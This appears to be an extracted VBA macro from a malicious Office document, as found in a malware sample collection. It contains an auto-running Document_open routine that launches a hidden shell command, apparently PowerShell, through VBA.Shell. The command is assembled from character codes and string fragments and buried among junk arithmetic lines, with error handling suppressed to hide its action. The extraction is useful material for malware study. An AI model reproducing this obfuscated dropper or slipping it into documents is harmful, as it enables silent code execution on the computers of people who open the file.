Filename     : ./macros/4bc49af887b69035a2f31928712816cd06b800b757360c16098d3c534ca84e23
OLE stream   : Macros/VBA/MiEPaQC
VBA filename : MiEPaQC.cls
----------------------------------------
Attribute VB_Name = "MiEPaQC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function kFzQIwvjcU()
On Error Resume Next
SuQhfr = (42370 * Sgn(BjLUHq) / 58641 / iWnuaU * QCpsNu + ChrW(PvmiE) / iPrqG * CInt(EJbBac))
FqnVhT = GMWzm
QltYJ = 44320 + vwWhc
VisVXQ = Rnd(fDYWLP)
BikBr = (95260 * Sgn(GsLSwr) / 99048 / LUNCbh * LdbjT + ChrW(YBinCi) / QiiGq * CInt(KndiQY))
QfpBOP = NZPlva
JwzRPi = 54591 + YvSfzo
jizKr = Rnd(wEAiq)
uwbEw = (24708 * Sgn(cwwDU) / 23550 / GkEQj * BqmMO + ChrW(ADXkal) / GiZBlJ * CInt(bvolrq))
lhuLK = IKGGuC
Mhqjfw = 23787 + VdqHMv
cNvXsz = Rnd(cTHZH)
BiOnvI = (74310 * Sgn(qbOZP) / 85050 / TrijhW * BJtSBc + ChrW(Himvj) / ATvXw * CInt(PPZmvI))
cFBBVX = jCzijW
PEMWS = 52026 + ihiTH
QBZBqO = Rnd(EDKOqA)
kFzQIwvjcU = kiAGwiizzdI + VBA.Shell(sMhzWnWTGwV + Chr(DqSjmHAZriw + vbKeyP + wBoHSRs) + "owers" + hCptNj + ijklFwjhYUf + wjBkkXvato + OTCaiCzItYi + uhziYIVX, 25412 - 25412)
BXNBu = (82436 * Sgn(PjcKRY) / 37329 / hKqPC * TAivS + ChrW(iUhUq) / alOnt * CInt(tBrCA))
HjcWwK = fiBdlF
Jzjzc = 57700 + nlAvKk
ziGAA = Rnd(XCcFtd)
rjUUi = (6335 * Sgn(InnQvv) / 7976 / smntWD * MzCSSW + ChrW(ruqwY) / bzYPi * CInt(ldmFF))
aWAZQ = WOhmK
GbdGvw = 15135 + twhzu
jlaTz = Rnd(nVDriW)
End Function
Private Sub Document_open()
On Error Resume Next
EqHfF = (98750 * Sgn(kkhtfF) / 11331 / rlNWf * BUtaV + ChrW(fGWftd) / TGJNIY * CInt(hhPhO))
wauzo = OdPAw
VAvtaz = 45689 + RsOXOR
MIibut = Rnd(TRTUSQ)
FQjvI = (46116 * Sgn(IDTNh) / 23575 / wjqUwf * wiRBs + ChrW(fXujX) / qJVZlP * CInt(zAmArf))
JpUEML = spjidP
XNdNBz = 4238 + mJhYF
ipXsCd = Rnd(lCWNE)
kFzQIwvjcU
qzmAm = (13427 * Sgn(zPcPdQ) / 2585 / djVCoF * DvwBs + ChrW(WNmWH) / zwjSn * CInt(NEAErj))
hHKha = tEiOB
VlIkp = 95215 + SaGEE
BwJtJj = Rnd(DIiSuP)
LupZC = (84541 * Sgn(Bltbw) / 29312 / KKWFUD * IkUJzn + ChrW(BvkVJP) / bQcjCB * CInt(RhYRjE))
CbAQwD = kTjHs
lOTdB = 80124 + WGCjuR
YoPVN = Rnd(MUZvr)
End Sub

